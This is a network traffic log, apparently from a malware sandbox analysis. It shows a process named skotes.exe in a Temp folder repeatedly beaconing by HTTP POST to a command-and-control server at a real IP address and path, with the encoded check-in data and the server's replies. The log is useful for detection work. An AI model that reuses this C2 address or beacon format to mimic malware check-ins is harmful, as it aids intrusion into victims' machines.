                                Nov 20, 2024 13:08:57.800014019 CET8050025185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:58.500287056 CET8050025185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:58.500679016 CET5002580192.168.2.4185.215.113.43
                                Nov 20, 2024 13:09:00.143368959 CET5002580192.168.2.4185.215.113.43
                                Nov 20, 2024 13:09:00.143579006 CET5002680192.168.2.4185.215.113.43
                                Nov 20, 2024 13:09:00.150620937 CET8050026185.215.113.43192.168.2.4
                                Nov 20, 2024 13:09:00.150732040 CET5002680192.168.2.4185.215.113.43
                                Nov 20, 2024 13:09:00.150880098 CET5002680192.168.2.4185.215.113.43
                                Nov 20, 2024 13:09:00.150907993 CET8050025185.215.113.43192.168.2.4
                                Nov 20, 2024 13:09:00.150978088 CET5002580192.168.2.4185.215.113.43
                                Nov 20, 2024 13:09:00.157763004 CET8050026185.215.113.43192.168.2.4
                                Nov 20, 2024 13:09:00.852583885 CET8050026185.215.113.43192.168.2.4
                                Nov 20, 2024 13:09:00.852847099 CET5002680192.168.2.4185.215.113.43
                                Nov 20, 2024 13:09:02.364768982 CET5002680192.168.2.4185.215.113.43
                                Nov 20, 2024 13:09:02.366369009 CET5002780192.168.2.4185.215.113.43
                                Nov 20, 2024 13:09:02.371599913 CET8050026185.215.113.43192.168.2.4
                                Nov 20, 2024 13:09:02.371736050 CET5002680192.168.2.4185.215.113.43
                                Nov 20, 2024 13:09:02.372926950 CET8050027185.215.113.43192.168.2.4
                                Nov 20, 2024 13:09:02.373022079 CET5002780192.168.2.4185.215.113.43
                                Nov 20, 2024 13:09:02.373483896 CET5002780192.168.2.4185.215.113.43
                                Nov 20, 2024 13:09:02.379936934 CET8050027185.215.113.43192.168.2.4
                                Nov 20, 2024 13:09:03.078866959 CET8050027185.215.113.43192.168.2.4
                                Nov 20, 2024 13:09:03.080607891 CET5002780192.168.2.4185.215.113.43
                                Nov 20, 2024 13:09:04.799666882 CET5002780192.168.2.4185.215.113.43
                                Nov 20, 2024 13:09:04.800280094 CET5002880192.168.2.4185.215.113.43
                                Nov 20, 2024 13:09:04.807941914 CET8050027185.215.113.43192.168.2.4
                                Nov 20, 2024 13:09:04.808010101 CET5002780192.168.2.4185.215.113.43
                                Nov 20, 2024 13:09:04.808423996 CET8050028185.215.113.43192.168.2.4
                                Nov 20, 2024 13:09:04.808549881 CET5002880192.168.2.4185.215.113.43
                                Nov 20, 2024 13:09:04.813427925 CET5002880192.168.2.4185.215.113.43
                                Nov 20, 2024 13:09:04.821029902 CET8050028185.215.113.43192.168.2.4
                                Nov 20, 2024 13:09:05.532282114 CET8050028185.215.113.43192.168.2.4
                                Nov 20, 2024 13:09:05.532429934 CET5002880192.168.2.4185.215.113.43
                                • 185.215.113.43
                                Session ID: 0 | Source: 192.168.2.4:49783 | Destination: 185.215.113.43:80 | PID: 3612 | Process: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Nov 20, 2024 13:08:05.080642939 CET | 156 | OUT | POST /Zu7JuNko/index.php HTTP/1.1
                                Content-Type: application/x-www-form-urlencoded
                                Host: 185.215.113.43
                                Content-Length: 4
                                Cache-Control: no-cache
                                Data Raw: 73 74 3d 73
                                Data Ascii: st=s
                                Nov 20, 2024 13:08:05.775851011 CET | 219 | IN | HTTP/1.1 200 OK
                                Server: nginx/1.18.0 (Ubuntu)
                                Date: Wed, 20 Nov 2024 12:08:05 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Refresh: 0; url = Login.php
                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 1 0


                                Session ID: 1 | Source: 192.168.2.4:49799 | Destination: 185.215.113.43:80 | PID: 3612 | Process: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Nov 20, 2024 13:08:07.287128925 CET | 308 | OUT | POST /Zu7JuNko/index.php HTTP/1.1
                                Content-Type: application/x-www-form-urlencoded
                                Host: 185.215.113.43
                                Content-Length: 154
                                Cache-Control: no-cache
                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                Nov 20, 2024 13:08:07.990255117 CET | 196 | IN | HTTP/1.1 200 OK
                                Server: nginx/1.18.0 (Ubuntu)
                                Date: Wed, 20 Nov 2024 12:08:07 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 7 <c><d>0


                                Session ID: 2 | Source: 192.168.2.4:49815 | Destination: 185.215.113.43:80 | PID: 3612 | Process: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Nov 20, 2024 13:08:09.616029978 CET | 156 | OUT | POST /Zu7JuNko/index.php HTTP/1.1
                                Content-Type: application/x-www-form-urlencoded
                                Host: 185.215.113.43
                                Content-Length: 4
                                Cache-Control: no-cache
                                Data Raw: 73 74 3d 73
                                Data Ascii: st=s
                                Nov 20, 2024 13:08:10.320969105 CET | 219 | IN | HTTP/1.1 200 OK
                                Server: nginx/1.18.0 (Ubuntu)
                                Date: Wed, 20 Nov 2024 12:08:10 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Refresh: 0; url = Login.php
                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 1 0


                                Session ID: 3 | Source: 192.168.2.4:49831 | Destination: 185.215.113.43:80 | PID: 3612 | Process: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Nov 20, 2024 13:08:11.836378098 CET | 308 | OUT | POST /Zu7JuNko/index.php HTTP/1.1
                                Content-Type: application/x-www-form-urlencoded
                                Host: 185.215.113.43
                                Content-Length: 154
                                Cache-Control: no-cache
                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                Nov 20, 2024 13:08:12.550599098 CET | 196 | IN | HTTP/1.1 200 OK
                                Server: nginx/1.18.0 (Ubuntu)
                                Date: Wed, 20 Nov 2024 12:08:12 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 7 <c><d>0


                                Session ID: 4 | Source: 192.168.2.4:49846 | Destination: 185.215.113.43:80 | PID: 3612 | Process: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Nov 20, 2024 13:08:14.256150961 CET | 156 | OUT | POST /Zu7JuNko/index.php HTTP/1.1
                                Content-Type: application/x-www-form-urlencoded
                                Host: 185.215.113.43
                                Content-Length: 4
                                Cache-Control: no-cache
                                Data Raw: 73 74 3d 73
                                Data Ascii: st=s
                                Nov 20, 2024 13:08:14.983750105 CET | 219 | IN | HTTP/1.1 200 OK
                                Server: nginx/1.18.0 (Ubuntu)
                                Date: Wed, 20 Nov 2024 12:08:14 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Refresh: 0; url = Login.php
                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 1 0


                                Session ID: 5 | Source: 192.168.2.4:49861 | Destination: 185.215.113.43:80 | PID: 3612 | Process: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Nov 20, 2024 13:08:16.506350040 CET | 308 | OUT | POST /Zu7JuNko/index.php HTTP/1.1
                                Content-Type: application/x-www-form-urlencoded
                                Host: 185.215.113.43
                                Content-Length: 154
                                Cache-Control: no-cache
                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                Nov 20, 2024 13:08:17.254261971 CET | 196 | IN | HTTP/1.1 200 OK
                                Server: nginx/1.18.0 (Ubuntu)
                                Date: Wed, 20 Nov 2024 12:08:17 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 7 <c><d>0


                                Session ID: 6 | Source: 192.168.2.4:49878 | Destination: 185.215.113.43:80 | PID: 3612 | Process: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Nov 20, 2024 13:08:18.883585930 CET | 156 | OUT | POST /Zu7JuNko/index.php HTTP/1.1
                                Content-Type: application/x-www-form-urlencoded
                                Host: 185.215.113.43
                                Content-Length: 4
                                Cache-Control: no-cache
                                Data Raw: 73 74 3d 73
                                Data Ascii: st=s
                                Nov 20, 2024 13:08:19.612067938 CET | 219 | IN | HTTP/1.1 200 OK
                                Server: nginx/1.18.0 (Ubuntu)
                                Date: Wed, 20 Nov 2024 12:08:19 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Refresh: 0; url = Login.php
                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 1 0


                                Session ID: 7 | Source: 192.168.2.4:49890 | Destination: 185.215.113.43:80 | PID: 3612 | Process: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Nov 20, 2024 13:08:21.134896994 CET | 308 | OUT | POST /Zu7JuNko/index.php HTTP/1.1
                                Content-Type: application/x-www-form-urlencoded
                                Host: 185.215.113.43
                                Content-Length: 154
                                Cache-Control: no-cache
                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                Nov 20, 2024 13:08:21.831510067 CET | 196 | IN | HTTP/1.1 200 OK
                                Server: nginx/1.18.0 (Ubuntu)
                                Date: Wed, 20 Nov 2024 12:08:21 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 7 <c><d>0


                                Session ID: 8 | Source: 192.168.2.4:49906 | Destination: 185.215.113.43:80 | PID: 3612 | Process: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Nov 20, 2024 13:08:23.459295988 CET | 156 | OUT | POST /Zu7JuNko/index.php HTTP/1.1
                                Content-Type: application/x-www-form-urlencoded
                                Host: 185.215.113.43
                                Content-Length: 4
                                Cache-Control: no-cache
                                Data Raw: 73 74 3d 73
                                Data Ascii: st=s
                                Nov 20, 2024 13:08:24.188796997 CET | 219 | IN | HTTP/1.1 200 OK
                                Server: nginx/1.18.0 (Ubuntu)
                                Date: Wed, 20 Nov 2024 12:08:24 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Refresh: 0; url = Login.php
                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 1 0


                                Session ID: 9 | Source: 192.168.2.4:49919 | Destination: 185.215.113.43:80 | PID: 3612 | Process: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Nov 20, 2024 13:08:25.709034920 CET | 308 | OUT | POST /Zu7JuNko/index.php HTTP/1.1
                                Content-Type: application/x-www-form-urlencoded
                                Host: 185.215.113.43
                                Content-Length: 154
                                Cache-Control: no-cache
                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                Nov 20, 2024 13:08:26.411521912 CET | 196 | IN | HTTP/1.1 200 OK
                                Server: nginx/1.18.0 (Ubuntu)
                                Date: Wed, 20 Nov 2024 12:08:26 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 7 <c><d>0


                                Session ID: 10 | Source: 192.168.2.4:49934 | Destination: 185.215.113.43:80 | PID: 3612 | Process: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Nov 20, 2024 13:08:28.044898033 CET | 156 | OUT | POST /Zu7JuNko/index.php HTTP/1.1
                                Content-Type: application/x-www-form-urlencoded
                                Host: 185.215.113.43
                                Content-Length: 4
                                Cache-Control: no-cache
                                Data Raw: 73 74 3d 73
                                Data Ascii: st=s
                                Nov 20, 2024 13:08:28.748363972 CET | 219 | IN | HTTP/1.1 200 OK
                                Server: nginx/1.18.0 (Ubuntu)
                                Date: Wed, 20 Nov 2024 12:08:28 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Refresh: 0; url = Login.php
                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 1 0


                                Session ID: 11 | Source: 192.168.2.4:49950 | Destination: 185.215.113.43:80 | PID: 3612 | Process: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Nov 20, 2024 13:08:30.256681919 CET | 308 | OUT | POST /Zu7JuNko/index.php HTTP/1.1
                                Content-Type: application/x-www-form-urlencoded
                                Host: 185.215.113.43
                                Content-Length: 154
                                Cache-Control: no-cache
                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                Nov 20, 2024 13:08:30.964792967 CET | 196 | IN | HTTP/1.1 200 OK
                                Server: nginx/1.18.0 (Ubuntu)
                                Date: Wed, 20 Nov 2024 12:08:30 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 7 <c><d>0


                                Session ID: 12 | Source: 192.168.2.4:49966 | Destination: 185.215.113.43:80 | PID: 3612 | Process: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Nov 20, 2024 13:08:32.602988958 CET | 156 | OUT | POST /Zu7JuNko/index.php HTTP/1.1
                                Content-Type: application/x-www-form-urlencoded
                                Host: 185.215.113.43
                                Content-Length: 4
                                Cache-Control: no-cache
                                Data Raw: 73 74 3d 73
                                Data Ascii: st=s
                                Nov 20, 2024 13:08:33.301089048 CET | 219 | IN | HTTP/1.1 200 OK
                                Server: nginx/1.18.0 (Ubuntu)
                                Date: Wed, 20 Nov 2024 12:08:33 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Refresh: 0; url = Login.php
                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 1 0


                                Session ID: 13 | Source: 192.168.2.4:49982 | Destination: 185.215.113.43:80 | PID: 3612 | Process: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Nov 20, 2024 13:08:34.819969893 CET | 308 | OUT | POST /Zu7JuNko/index.php HTTP/1.1
                                Content-Type: application/x-www-form-urlencoded
                                Host: 185.215.113.43
                                Content-Length: 154
                                Cache-Control: no-cache
                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                Nov 20, 2024 13:08:35.548026085 CET | 196 | IN | HTTP/1.1 200 OK
                                Server: nginx/1.18.0 (Ubuntu)
                                Date: Wed, 20 Nov 2024 12:08:35 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 7 <c><d>0


                                Session ID: 14 | Source IP: 192.168.2.4 | Source Port: 49998 | Destination IP: 185.215.113.43 | Destination Port: 80 | PID: 3612 | Process: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Nov 20, 2024 13:08:37.243161917 CET | 156 | OUT | POST /Zu7JuNko/index.php HTTP/1.1
                                Content-Type: application/x-www-form-urlencoded
                                Host: 185.215.113.43
                                Content-Length: 4
                                Cache-Control: no-cache
                                Data Raw: 73 74 3d 73
                                Data Ascii: st=s
                                Nov 20, 2024 13:08:37.965090036 CET | 219 | IN | HTTP/1.1 200 OK
                                Server: nginx/1.18.0 (Ubuntu)
                                Date: Wed, 20 Nov 2024 12:08:37 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Refresh: 0; url = Login.php
                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 1 0


                                Session ID: 15 | Source IP: 192.168.2.4 | Source Port: 50012 | Destination IP: 185.215.113.43 | Destination Port: 80 | PID: 3612 | Process: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Nov 20, 2024 13:08:39.474896908 CET | 308 | OUT | POST /Zu7JuNko/index.php HTTP/1.1
                                Content-Type: application/x-www-form-urlencoded
                                Host: 185.215.113.43
                                Content-Length: 154
                                Cache-Control: no-cache
                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                Nov 20, 2024 13:08:40.175301075 CET | 196 | IN | HTTP/1.1 200 OK
                                Server: nginx/1.18.0 (Ubuntu)
                                Date: Wed, 20 Nov 2024 12:08:40 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 7 <c><d>0


                                Session ID: 16 | Source IP: 192.168.2.4 | Source Port: 50018 | Destination IP: 185.215.113.43 | Destination Port: 80 | PID: 3612 | Process: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Nov 20, 2024 13:08:41.816001892 CET | 156 | OUT | POST /Zu7JuNko/index.php HTTP/1.1
                                Content-Type: application/x-www-form-urlencoded
                                Host: 185.215.113.43
                                Content-Length: 4
                                Cache-Control: no-cache
                                Data Raw: 73 74 3d 73
                                Data Ascii: st=s
                                Nov 20, 2024 13:08:42.518135071 CET | 219 | IN | HTTP/1.1 200 OK
                                Server: nginx/1.18.0 (Ubuntu)
                                Date: Wed, 20 Nov 2024 12:08:42 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Refresh: 0; url = Login.php
                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 1 0


                                Session ID: 17 | Source IP: 192.168.2.4 | Source Port: 50019 | Destination IP: 185.215.113.43 | Destination Port: 80 | PID: 3612 | Process: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Nov 20, 2024 13:08:44.042555094 CET | 308 | OUT | POST /Zu7JuNko/index.php HTTP/1.1
                                Content-Type: application/x-www-form-urlencoded
                                Host: 185.215.113.43
                                Content-Length: 154
                                Cache-Control: no-cache
                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                Nov 20, 2024 13:08:44.736030102 CET | 196 | IN | HTTP/1.1 200 OK
                                Server: nginx/1.18.0 (Ubuntu)
                                Date: Wed, 20 Nov 2024 12:08:44 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 7 <c><d>0


                                Session ID: 18 | Source IP: 192.168.2.4 | Source Port: 50020 | Destination IP: 185.215.113.43 | Destination Port: 80 | PID: 3612 | Process: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Nov 20, 2024 13:08:46.369529009 CET | 156 | OUT | POST /Zu7JuNko/index.php HTTP/1.1
                                Content-Type: application/x-www-form-urlencoded
                                Host: 185.215.113.43
                                Content-Length: 4
                                Cache-Control: no-cache
                                Data Raw: 73 74 3d 73
                                Data Ascii: st=s
                                Nov 20, 2024 13:08:47.083113909 CET | 219 | IN | HTTP/1.1 200 OK
                                Server: nginx/1.18.0 (Ubuntu)
                                Date: Wed, 20 Nov 2024 12:08:46 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Refresh: 0; url = Login.php
                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 1 0


                                Session ID: 19 | Source IP: 192.168.2.4 | Source Port: 50021 | Destination IP: 185.215.113.43 | Destination Port: 80 | PID: 3612 | Process: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Nov 20, 2024 13:08:48.664452076 CET | 308 | OUT | POST /Zu7JuNko/index.php HTTP/1.1
                                Content-Type: application/x-www-form-urlencoded
                                Host: 185.215.113.43
                                Content-Length: 154
                                Cache-Control: no-cache
                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                Nov 20, 2024 13:08:49.359998941 CET | 196 | IN | HTTP/1.1 200 OK
                                Server: nginx/1.18.0 (Ubuntu)
                                Date: Wed, 20 Nov 2024 12:08:49 GMT
                                Content-Type: text/html; charset=UTF-8
